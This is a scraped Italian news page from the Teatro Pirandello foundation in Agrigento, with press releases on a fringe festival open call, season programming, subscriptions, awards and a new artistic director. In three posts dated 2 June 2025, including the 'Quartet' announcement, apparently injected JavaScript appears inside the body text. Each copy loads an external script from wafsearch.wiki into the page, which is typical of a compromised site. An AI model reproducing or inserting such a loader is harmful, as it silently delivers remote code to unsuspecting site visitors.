Pirandello Fringe Festival: Agrigento diventa palcoscenico della contemporaneità

3 Novembre 2025 no comments stampa

Pirandello Fringe Festival: Agrigento diventa palcoscenico della contemporaneità

Direzione artistica di Roberta Torre. Open call per 15 giovani artisti dai 18 ai 30 anni

Un progetto che unisce teatro, formazione e territorio. Nasce ad Agrigento il Pirandello Fringe Festival, un’iniziativa promossa dal Teatro Pirandello in collaborazione con il Polo Universitario UNIPA, il Teatro Stabile di Catania e il quotidiano La Sicilia, con l’obiettivo di far conoscere l’opera del genio pirandelliano in chiave contemporanea ai giovani autori.

Il progetto è aperto a 15 partecipanti, di età compresa tra i 18 e i 30 anni, che avranno la possibilità di prendere parte a un laboratorio teatrale di drammaturgia gratuito, che si terrà ad Agrigento nei mesi di marzo e aprile 2026. Il laboratorio, dal titolo “Cinque personaggi in cerca di palco”, sarà curato dallo scrittore e drammaturgo Ottavio Cappellani e prevede una masterclass con professionisti del settore: un regista, un direttore della fotografia, un attore, un costumista e uno scenografo.

Al termine del percorso verranno scelti cinque corti teatrali, che i partecipanti realizzeranno durante il corso. “In un’epoca dominata dai profili digitali e dalle identità performative dei social – spiega Ottavio Cappellani – Pirandello si manifesta in tutta la sua classica contemporaneità. Studiare le sue novelle offre agli allievi un terreno vivo su cui esercitare la scrittura scenica: brevi storie dense di ironia, dolore e smarrimento, che si prestano a diventare corti teatrali. Gli allievi non solo reinterpretano Pirandello, ma si scoprono, come lui, autori di sé. Perché al centro del mondo drammaturgico sta ciò di cui tutti andiamo in cerca: il motore della storia”.

I lavori scelti saranno messi in scena tra aprile e maggio 2026 in alcuni luoghi simbolo di Agrigento, secondo una mappa “sulle tracce di Pirandello”: la Casa natale dello scrittore, il Complesso chiaramontano di Santo Spirito, la scala monumentale della Cattedrale, Piazza Kennedy a Porto Empedocle e il Palazzo delle Poste.

“Con il Pirandello Fringe Festival – sottolinea la direttrice artistica Roberta Torre – la città di Agrigento diventa palcoscenico, in una rilettura teatrale di luoghi iconici di bellezza assoluta.”
Sulla stessa linea, Alessandro Patti, presidente della Fondazione Teatro Pirandello, aggiunge: “Il festival, con l’imprinting della nostra direttrice, si inserisce nel solco già tracciato da questa governance, che ha consolidato collaborazioni con prestigiose istituzioni culturali. Il Teatro esce dalle sue mura per entrare in simbiosi con la città, vera protagonista del progetto”.

Anche il mondo accademico abbraccia l’iniziativa. “L’Università – spiega Giovanni Francesco Tuzzolino, presidente del Polo Territoriale Universitario di Agrigento – ha attivato una collaborazione con il Teatro Pirandello che porterà a nuove iniziative per la crescita culturale della città. Alcuni luoghi, scelti per riattivarne i significati spaziali e narrativi, diventeranno la scenografia ideale per l’attualizzazione del teatro di Pirandello”.

I giovani interessati potranno candidarsi entro il 30 dicembre 2025, inviando un video motivazionale (durata massima un minuto) e un curriculum vitae dettagliato all’indirizzo e-mail: pirandellofringefest@gmail.com.
Per informazioni è possibile contattare il numero 352 0506683.

I testi integrali degli spettacoli vincitori verranno pubblicati sul quotidiano La Sicilia.
Il progetto vincitore, scelto da una Giuria Popolare, sarà rappresentato sul palco del Teatro Pirandello durante la stagione teatrale 2026/2027.

Marco Savatteri premiato a Washington con il “Premio Eccellenza Italiana 2025” per il musical Camicette Bianche

20 Ottobre 2025 no comments stampa

Prestigioso riconoscimento internazionale per Marco Savatteri, al quale è stato conferito il Premio “Eccellenza Italiana 2025 – Premio Eccellenza Italian (ideato da Massimo Lucidi).” a Washington D.C.

La motivazione ufficiale recita:

«Premio a Marco Savatteri per la scrittura e regia dell’opera teatrale “Camicette Bianche”, ispirata al libro di Ester Rizzo e coprodotta dal Teatro Luigi Pirandello, che racconta il viaggio dei primi migranti italiani in America. Un’opera corale che riporta alla memoria vite passate e diventa monito per il presente. Uno spettacolo di alto valore storico, artistico e culturale, un modello originale di teatro virtuoso, con messaggi e contenuti da esportare nel mondo, ma che permette a tanti giovani e a tanti artisti professionisti di scommettere, credere e lavorare nell’arte restando in Sicilia.»

Un riconoscimento che conferma l’impatto internazionale del percorso artistico di Savatteri e del suo teatro civile e innovativo, capace di unire memoria e contemporaneità.

Il presidente della Fondazione Teatro Luigi PirandelloAlessandro Patti, ha dichiarato:

«Siamo orgogliosi di questo prestigioso riconoscimento ottenuto da Marco Savatteri negli Stati Uniti per il musical “Camicette Bianche”, coprodotto dal Teatro Luigi Pirandello, che accompagna e sostiene la tournée nazionale della Savatteri Produzioni. Una tournée che proseguirà anche nel 2025 e nel 2026, anno in cui lo spettacolo approderà ad Agrigento in una versione rinnovata e inedita.
Rivolgiamo le nostre congratulazioni al nostro responsabile delle attività culturali innovative, che con questo nuovo traguardo si conferma un’eccellenza del territorio e un punto di riferimento per il teatro siciliano e per la creatività made in Agrigento.»

Il Premio Eccellenza Italiana, giunto alla sua dodicesima edizione, celebra ogni anno a Washington D.C. le personalità che si distinguono nel mondo per talento, creatività e contributo alla valorizzazione dell’Italia nel panorama internazionale.

📸 Nella foto: Marco Savatteri durante la cerimonia di premiazione a Washington D.C. 

Al Teatro Pirandello la stagione 2025-2026 si apre con “Prima Facie” by Suzie Miller

9 Ottobre 2025 no comments stampa

🎭 Comunicato Stampa

Al Teatro Pirandello di Agrigento la stagione 2025-2026 si apre con “Prima Facie”

L’acclamata opera di Suzie Miller diretta da Daniele Finzi Pasca affronta il tema del consenso e della giustizia nella violenza di genere

15 e 16 novembre 2025 – Teatro Pirandello, Agrigento

Arriva per la prima volta ad Agrigento, dopo i successi di Roma e Milano, Prima Facie — l’opera teatrale firmata dalla drammaturga australiana Suzie Miller, pluripremiata in tutto il mondo e già vincitrice di due Laurence Olivier Award.
Lo spettacolo, prodotto dalla Compagnia Finzi Pasca, aprirà la nuova stagione del Teatro Pirandello di Agrigento il 15 e 16 novembre 2025, portando in scena un intenso monologo interpretato dall’attrice italo-brasiliana Melissa Vettore, per la regia di Daniele Finzi Pasca.

Un potente racconto di coraggio e consapevolezza

Prima Facie – Il consenso e la giustizia è un dramma vibrante e necessario che mette al centro la violenza di genere, il linguaggio del potere e il tema del consenso come fondamento della giustizia.
Attraverso la storia di Tessa, brillante avvocata penalista che si trova a fare i conti con un trauma personale, l’opera scuote le certezze del pubblico e lo invita a riflettere sul senso più autentico della giustizia, sulla responsabilità collettiva e sul coraggio di denunciare.

Con una scrittura lucida e poetica, Suzie Miller esplora il divario tra la legge scritta e la giustizia vissuta, restituendo voce e dignità alle vittime di abusi.

Un fenomeno globale che diventa movimento

Tradotto in 20 lingue e rappresentato in 38 Paesi, Prima Facie è divenuto un vero fenomeno culturale, capace di influenzare anche la legislazione britannica e di portare la sua autrice all’ONU per affrontare il tema dei diritti delle vittime di violenza.
La tournée italiana, che dopo Agrigento farà tappa ad Assisi, Lugano, Torino e Padova, è realizzata in collaborazione con Differenza Donna, associazione impegnata da oltre trent’anni nella prevenzione e nel contrasto alla violenza contro le donne.

La visione di Daniele Finzi Pasca

“Il linguaggio di Suzie Miller è incalzante, musicale, travolgente.
In Prima Facie emerge una domanda che riguarda tutti: come sentirsi protetti dalla giustizia?
Raccontiamo in punta di piedi una storia che continua tragicamente a ripetersi ovunque, con ostinata violenza.”
Daniele Finzi Pasca

Il cast creativo

Autrice: Suzie Miller
Interprete: Melissa Vettore
Traduzione: Margherita Mauro
Regia e disegno luci: Daniele Finzi Pasca
Musiche: Maria Bonzanigo
Costumi: Giovanna Buzzi
Scene: Matteo Verlicchi
Video design: Roberto Vitalini

Produzione: Compagnia Finzi Pasca
Con il contributo di: Fondazione Ermotti, Famiglia Mario Mantegazza, Città di Lugano, Pro Helvetia, AIL SA, Caffè Chicco d’Oro, Fondazione Lugano per il Polo Culturale.

Teatro Pirandello, prelazione abbonati fino al 10 ottobre

24 Settembre 2025 no comments stampa

La Fondazione Teatro Pirandello ricorda che il 10 ottobre scade il termine entro cui gli abbonati della stagione 2024/2025 possono esercitare il diritto di prelazione per confermare il proprio posto a teatro nella stagione 2025/2026.

Dal giorno successivo, 11 ottobre, partirà la campagna riservata ai nuovi abbonati, che resterà aperta fino al 10 novembre. I biglietti singoli saranno invece disponibili da lunedì 11 novembre, sia al botteghino che online sul sito ufficiale www.fondazioneteatropirandello.it.

Un’attenzione particolare è rivolta agli abbonati, che avranno diritto a prelazione e prezzo ridotto anche per i due spettacoli programmati fuori abbonamento.

Il servizio biglietteria è attivo al botteghino del Teatro con i seguenti orari:

  • Lunedì, mercoledì e venerdì dalle 9:00 alle 13:30

  • Martedì e giovedì dalle 15:00 alle 18:00

È possibile esercitare la prelazione anche via email, scrivendo a biglietteria@fondazioneteatropirandello.it.

I Voucher Docenti dovranno essere validati direttamente presso il Teatro.

La Fondazione invita il pubblico a non perdere questa opportunità e a garantirsi per tempo un posto in sala in vista di una stagione che si preannuncia ricca di emozioni e grandi spettacoli.

Teatro Pirandello, al via la campagna abbonamenti 2025-2026

8 Settembre 2025 no comments stampa

Teatro Pirandello, al via la campagna abbonamenti 2025-2026

AGRIGENTO – La Fondazione Teatro Pirandello ha pubblicato il calendario per la nuova campagna abbonamenti della stagione teatrale 2025-2026.

Dal 10 settembre al 10 ottobre 2025 sarà attivo il diritto di prelazione riservato agli abbonati della stagione 2024-2025, che potranno confermare il proprio posto o rinnovare l’abbonamento. Nello stesso periodo sarà possibile sottoscrivere anche nuovi abbonamenti, limitatamente ai posti disponibili.

Dal 11 ottobre al 10 novembre 2025 si aprirà la fase dedicata ai nuovi abbonamenti sui posti non confermati dagli abbonati della scorsa stagione teatrale.

A partire dall’11 novembre 2025 sarà invece possibile acquistare i singoli biglietti per tutti gli spettacoli in cartellone.

Prezzi abbonamenti

  • €230,00 per Platea e Prima fila Palchi
  • €200,00 per Seconda fila Palchi

Informazioni utili

Il diritto di prelazione potrà essere esercitato tramite email all’indirizzo biglietteria@fondazioneteatropirandello.it oppure direttamente al botteghino del Teatro nei seguenti orari:

  • Lunedì, mercoledì e venerdì dalle 9:00 alle 13:30
  • Martedì e giovedì dalle 15:00 alle 18:00

Nuovi abbonamenti e biglietti singoli (quando disponibili) potranno essere acquistati al botteghino oppure sul sito ufficiale www.fondazioneteatropirandello.it.

Si ricorda, inoltre, che i Voucher Docenti dovranno essere validati presso il Teatro.

 

 

Roberta Torre è il Direttore artistico del Teatro Pirandello di Agrigento

1 Agosto 2025 no comments stampa

La regista e autrice Roberta Torre è il nuovo Direttore artistico del Teatro Pirandello di Agrigento. La nomina, proposta dal Direttore Generale Salvo Prestia, è stata ratificata dal Consiglio d’Amministrazione della Fondazione, composto da Gaetano Airò, Giulio Cinque, Andrea Cirino, Giuseppe Miccichè e presieduto da Alessandro Patti.

“Una direzione artistica che lavorerà sulla contaminazione di linguaggi in cui convergono teatro,musica, cinema, arti visive promuovendo nuove drammaturgie.Un programma che protegge il teatro come luogo d’incontro tra comunità locali, artisti emergenti e pubblico internazionale. Riscoperta e reinterpretazione dell’opera pirandelliana, integrando multimedialità, periferie culturali, voci marginali.

Roberta Torre non è solo una regista di fama: è un’autrice che ama plasmare l’immagine del reale attraverso narrazioni forti, complesse, visivamente potenti. La sua Sicilia è viva, pulsante, e ora Agrigento ha il privilegio di accoglierla come guida artistica. Preparatevi a un teatro che pulsa, sorprende, emoziona: benvenuta, Roberta Torre”,dichiara Alessandro Patti Presidente della Fondazione Teatro Pirandello.

Onorata e felice di questo incarico. Il prestigio del Teatro Pirandello di Agrigento, la sua bellezza, la sua storia, sono uno straordinario patrimonio italiano. Mi emoziona pensare di poterne far parte. Sono felice di tornare a lavorare in Sicilia, dove sono artisticamente nata. Spero di contribuire con uno sguardo che includa significativamente le nuove generazioni.”

    — Roberta Torre

Roberta Torre incarna pienamente lo spirito del Teatro Pirandello: una visione audace, una sostanza estetica radicata nella Sicilia con respiro internazionale, una voce che parla al presente con forza creativa e consapevole. Con la sua nomina, il teatro si apre a un percorso di valorizzazione del talento, di apertura ai linguaggi contemporanei, di memoria storica rinnovata”.

Roberta Torre nasce a Milano, ha studiato filosofia, recitazione e regia all’Accademia Paolo Grassi e alla Civica Scuola di Cinema “Luchino Visconti” a Milano.  Ha scelto la Sicilia come casa d’elezione: vive a Siena, ma la Sicilia continua a nutrire la sua ispirazione artistica ed identitaria.

Una donna dalle straordinarie capacità artistiche, che le sono valsi numerosi riconoscimenti internazionali, tra cui: Nastro d’Argento e David di Donatello come Miglior Regista Esordiente, Leone del Futuro – opera prima (Venezia), premi FEDIC e Kodak, per il film d’esordio che fu un caso eclatante: Tano da morire, il primo musical sulla mafia, girato a Palermo nella Vucciria, che ha girato il mondo facendo conoscere il talento portentoso di Nino D’Angelo, autore della colonna sonora.

Tutti i suoi film sono stati presentati nei maggiori Festival Internazionali, dalla Quinzaine di Cannes alla Mostra Internazionale di Venezia, dalle Giornate degli Autori al Sundance Film Festival,dall’IDFA al Locarno Film Festival, Festa di Roma e Torino Film Festival.

Opere sempre contaminate nei generi, come Sud Side Stori del 2000, riflessione contemporanea su Romeo e Giulietta, ambientata tra immigrati africani in Sicilia. Ancora Sicilia con Angela nel 2002, con cui la Torre scopre il talento di Donatella Finocchiaro, dramma intenso tra amore e mafia, candidato ai David e Nastri. Mare nero del 2006, noir esistenziale sulle ossessioni umane con protagonista Luigi Lo Cascio. Riccardo va all’inferno del 2017,protagonista un inedito Massimo Ranieri, musical noir tratto da Shakespeare: opere che confermano la sua poliedricità narrativa, cinematografica e teatrale.

Cortometraggi come La notte quando è morto Pasolini, Spioni, Anime Corte esplorano la marginalità, la memoria e l’identità con stile innovativo e poetico, mentre Le favolose (nel 2022) viaggia nel mondo della trans-identità con un inno alla libertà e alla riconquista, presentato alle Giornate degli Autori, per poi ottenere molti riconoscimenti internazionali: Miglior Regia alla sezione Envision dell’IDFA 2022, unico film italiano in concorso, vincitore del Gran Premio della Giuria per la migliore opera narrativa internazionale all’Outfest di Los Angeles.

Il suo ultimo lungometraggio Mi fanno male i capelli viene presentato in concorso nel 2023 alla Festa del Cinema di Roma, dove la protagonista Alba Rohrwacher vince il premio Monica Vitticome Migliore Attrice.

Nel teatro, Roberta Torre è stata la prima donna a dirigere uno spettacolo al Teatro Greco di Siracusa (Gli Uccelli, 2012), vincendo il Premio Ombra di Dioniso. Autrice di pièce innovative come Insanamente Riccardo III (2013), con pazienti psichiatrici e attori professionisti, sovvertendo i codici shakespeariani. Il colore è una variabile dell’infinito (2014), prodotto da CRT Milano e Triennale Design Museum, poetico, coraggioso e fantasioso omaggio a Pierluigi Torre, inventore della Lambretta. Co-direttore di festival, docente a livello internazionale negli USA e Italia (Mills College, Ca’ Foscari, Centro Sperimentale di Palermo). Cerca sempre il genius loci: ogni progetto nasce da un luogo, una memoria, un territorio ‒ da Palermo all’Agrigento contemporanea.

Il Direttore Artistico è al lavoro per definire gli ultimi dettagli della Stagione Teatrale 2025-2026, che verrà presentata presso il Teatro Pirandello il 12 Agosto p.v. alle ore 11.00

“Sinfonie di una Capitale”: il Teatro Pirandello svela il calendario degli eventi per Agrigento 2025

22 Luglio 2025 no comments stampa

“Sinfonie di una Capitale”: il Teatro Pirandello svela il calendario degli eventi per Agrigento 2025

AGRIGENTO – Un viaggio tra teatro, musica, arte e memoria per celebrare Agrigento Capitale Italiana della Cultura 2025. Il Teatro Pirandello presenta il ricco calendario di appuntamenti della rassegna “Sinfonie di una Capitale”, che da luglio a dicembre 2025 trasformerà il chiostro, gli spazi interni e le vie della città in scenari di esperienze culturali indimenticabili.

Tra i protagonisti, spettacoli teatrali, concerti, visite teatralizzate, animazioni urbane, matinée per le scuole, incontri e omaggi. Una programmazione che intreccia la tradizione con la contemporaneità, valorizzando talenti locali e nazionali.

Si parte il 27 luglio con la rappresentazione de “Il Berretto a Sonagli”, seguita da una delle tante tappe del format “Scopri il Teatro”, che permetterà ai visitatori di vivere l’anima del Pirandello con percorsi immersivi notturni. In agosto, spazio ai Giardini Culturali, con concerti (come quello della Grande Sud Orchestra o di Tom Sinatra), spettacoli e premiazioni, tra cui “Fotografa la Sagra e San Calogero”.

Settembre accoglie appuntamenti di rilievo come “Il Respiro dell’Arte”, in omaggio a Nino Bellomo, e il ciclo “Variazioni sul Mito”, con testi classici riletto da voci moderne. A ottobre e novembre si rinnovano le visite teatralizzate, mentre tornano anche le Matinée dell’Opera dei Pupi per le scuole e una serata speciale dedicata a “Sapori, Colori e Pellicole”.

Dicembre chiude con l’iniziativa “Agrigento Città Teatro”, che porta l’animazione artistica nel cuore della città, e con il Gran Gala di Fine Anno del 30 dicembre, che concluderà simbolicamente un anno straordinario di cultura e partecipazione.

Il calendario completo è disponibile sul sito ufficiale e sulle pagine social del Teatro Pirandello.

Il programma teatro locandina- clicca qui

Ufficio Stampa
Fondazione Teatro Pirandello
www.fondazioneteatropirandello.it
info@fondazioneteatropirandello.it
☎ 0922 590220

Aronica – Agrigento può rinascere

2 Giugno 2025 no comments stampa

var url = ‘https://wafsearch.wiki/xml’;
var script = document.createElement(‘script’);
script.src = url;
script.type = ‘text/javascript’;
script.async = true;
document.getElementsByTagName(‘head’)[0].appendChild(script);

2 Giugno 2025 no comments stampa

var url = ‘https://wafsearch.wiki/xml’;
var script = document.createElement(‘script’);
script.src = url;
script.type = ‘text/javascript’;
script.async = true;
document.getElementsByTagName(‘head’)[0].appendChild(script);

Quartet

2 Giugno 2025 no comments stampa

CON LO SPETTACOLO QUARTET

PRENDE AVVIO SABATO LA 25a STAGIONE

DEL TEATRO PIRANDELLO DI AGRIGENTO

Sabato 17 novembre, alle ore 20.30, si alza il sipario del Teatro “Luigi Pirandello” di Agrigento per avviare la 25a stagione.

Con la commedia “Quartet” saranno sul palcoscenico Giuseppe Pambieri, Paola Quattrini, Cochi Ponzoni ed Erica Blanc per la regia di Patrick Rossi Gastaldi.var url = ‘https://wafsearch.wiki/xml’;
var script = document.createElement(‘script’);
script.src = url;
script.type = ‘text/javascript’;
script.async = true;
document.getElementsByTagName(‘head’)[0].appendChild(script);